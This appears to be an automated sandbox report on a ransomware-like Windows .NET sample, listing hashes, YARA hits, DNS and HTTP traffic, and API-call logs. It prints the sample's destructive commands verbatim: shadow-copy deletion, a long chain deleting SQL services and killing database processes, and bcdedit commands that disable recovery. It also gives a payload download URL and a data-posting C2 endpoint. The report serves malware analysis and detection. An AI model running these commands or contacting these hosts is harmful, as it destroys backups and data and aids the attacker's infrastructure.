Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6403_us	March 11, 2023, 10:28 a.m.	March 11, 2023, 10:34 a.m.

Size	579.5KB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`4f351910b30c279944615955228db869`
SHA256	`a9543bc9612276863fc77b663fa3ff6efb85db69a01baa86c6dfabf73684b5c1`
CRC32	`0AAA3F06`
ssdeep	`12288:anmEGL0Wm5bhDDu6x9kUvsHo8goHv2g10qM+:NJL/mry6M1O+`
PDB Path	Yfgvvxyduvu.pdb
Yara	UPX_Zero - UPX packed file OS_Processor_Check_Zero - OS Processor Check Win32_Trojan_PWS_Net_1_Zero - Win32 Trojan PWS .NET Azorult Is_DotNET_EXE - (no description) Win_Backdoor_AsyncRAT_Zero - Win Backdoor AsyncRAT IsPE32 - (no description) PE_Header_Zero - PE File Signature

a-Yfgvvxyduvu.exe "C:\Users\test22\AppData\Local\Temp\a-Yfgvvxyduvu.exe"
1836
- powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwAwAA==
  2140
- a-Yfgvvxyduvu.exe C:\Users\test22\AppData\Local\Temp\a-Yfgvvxyduvu.exe
  2744
  - vssadmin.exe "C:\Windows\sysnative\vssadmin.exe" delete shadows /all /quiet
    2864
  - cmd.exe "C:\Windows\System32\cmd.exe" /C sc delete "MSSQLFDLauncher"&&sc delete "MSSQLSERVER"&&sc delete "SQLSERVERAGENT"&&sc delete "SQLBrowser"&&sc delete "SQLTELEMETRY"&&sc delete "MsDtsServer130"&&sc delete "SSISTELEMETRY130"&&sc delete "SQLWriter"&&sc delete "MSSQL$VEEAMSQL2012"&&sc delete "SQLAgent$VEEAMSQL2012"&&sc delete "MSSQL"&&sc delete "SQLAgent"&&sc delete "MSSQLServerADHelper100"&&sc delete "MSSQLServerOLAPService"&&sc delete "MsDtsServer100"&&sc delete "ReportServer"&&sc delete "SQLTELEMETRY$HL"&&sc delete "TMBMServer"&&sc delete "MSSQL$PROGID"&&sc delete "MSSQL$WOLTERSKLUWER"&&sc delete "SQLAgent$PROGID"&&sc delete "SQLAgent$WOLTERSKLUWER"&&sc delete "MSSQLFDLauncher$OPTIMA"&&sc delete "MSSQL$OPTIMA"&&sc delete "SQLAgent$OPTIMA"&&sc delete "ReportServer$OPTIMA"&&sc delete "msftesql$SQLEXPRESS"&&sc delete "postgresql-x64-9.4"&&rem Kill "SQL"&&taskkill -f -im sqlbrowser.exe&&taskkill -f -im sqlwriter.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im msmdsrv.exe&&taskkill -f -im MsDtsSrvr.exe&&taskkill -f -im sqlceip.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im Ssms.exe&&taskkill -f -im SQLAGENT.EXE&&taskkill -f -im fdhost.exe&&taskkill -f -im fdlauncher.exe&&taskkill -f -im sqlservr.exe&&taskkill -f -im ReportingServicesService.exe&&taskkill -f -im msftesql.exe&&taskkill -f -im pg_ctl.exe&&taskkill -f -im postgres.exe
    2940
    - sc.exe sc delete "MSSQLFDLauncher"
      804
  - cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} bootstatuspolicy ignoreallfailures
    2932
  - cmd.exe "C:\Windows\System32\cmd.exe" /c bcdedit /set {current} recoveryenabled no
    3060

Name	Response	Post-Analysis Lookup
whyers.io	A 172.67.191.103 A 104.21.76.77	104.21.76.77
api.ipify.org	A 64.185.227.155 CNAME api4.ipify.org A 104.237.62.211 A 173.231.16.76	173.231.16.76

IP Address	Status	Action
164.124.101.2	Active	Moloch
172.67.191.103	Active	Moloch
64.185.227.155	Active	Moloch
80.66.75.36	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.103:49177 -> 64.185.227.155:80	2021997	ET POLICY External IP Lookup api.ipify.org	Device Retrieving External IP Address Detected
TCP 192.168.56.103:49178 -> 172.67.191.103:443	906200054	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.103:49178 172.67.191.103:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1P5	CN=*.whyers.io	f5:77:f9:d5:9f:51:3f:28:5f:77:06:45:93:e4:0b:2c:db:f8:5b:52

Queries for the computername (9 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA March 11, 2023, 10:28 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (4 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 11, 2023, 10:28 a.m.			0	0
IsDebuggerPresent March 11, 2023, 10:28 a.m.			0	0
IsDebuggerPresent March 11, 2023, 10:28 a.m.			0	0
IsDebuggerPresent March 11, 2023, 10:28 a.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 11, 2023, 10:21 a.m.	buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp. console_handle: 0x0000000000000007	1	1
WriteConsoleW March 11, 2023, 10:21 a.m.	buffer: No items found that satisfy the query. console_handle: 0x0000000000000007	1	1
WriteConsoleW March 11, 2023, 10:28 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 11, 2023, 10:28 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW March 11, 2023, 10:28 a.m.	buffer: [SC] OpenService FAILED 1060: The specified service does not exist as an installed service. console_handle: 0x00000007	1	1

Uses Windows APIs to generate a cryptographic key (43 events)

Time & API	Arguments	Status	Return
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00400580 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00400580 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004006c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9eb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c97f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c97f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c97f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c97f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c97f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c97f0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9ff0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca270 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca570 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca330 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey March 11, 2023, 10:28 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006ca3b0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

This executable has a PDB path (1 event)

pdb_path

Yfgvvxyduvu.pdb

Tries to locate where the browsers are installed (1 event)

file	C:\Program Files\Mozilla Firefox\browser\VisualElements\FILE RECOVERY.txt

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 11, 2023, 10:28 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (3 events)

suspicious_features	GET method with no useragent header, Connection to IP address	suspicious_request	GET http://80.66.75.36/a-Cjjle.png
suspicious_features	GET method with no useragent header	suspicious_request	GET http://api.ipify.org/
suspicious_features	POST method with no referer header, POST method with no useragent header	suspicious_request	POST https://whyers.io/QWEwqdsvsf/ap.php

Performs some HTTP requests (3 events)

request	GET http://80.66.75.36/a-Cjjle.png
request	GET http://api.ipify.org/
request	POST https://whyers.io/QWEwqdsvsf/ap.php

Sends data using the HTTP POST Method (1 event)

request

POST https://whyers.io/QWEwqdsvsf/ap.php

Allocates read-write-execute memory (usually to unpack itself) (50 out of 204 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00760000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f31000 process_handle: 0xffffffff	1
NtProtectVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73f32000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 983040 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00640000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x006f0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00522000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00555000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0055b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00557000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00547000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00546000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0054b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ac9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00aca000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00acb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00acc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00ace000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00acf000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053d000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0052c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053e000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0053a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05400000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x053e8000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory March 11, 2023, 10:28 a.m.	process_identifier: 1836 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05410000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
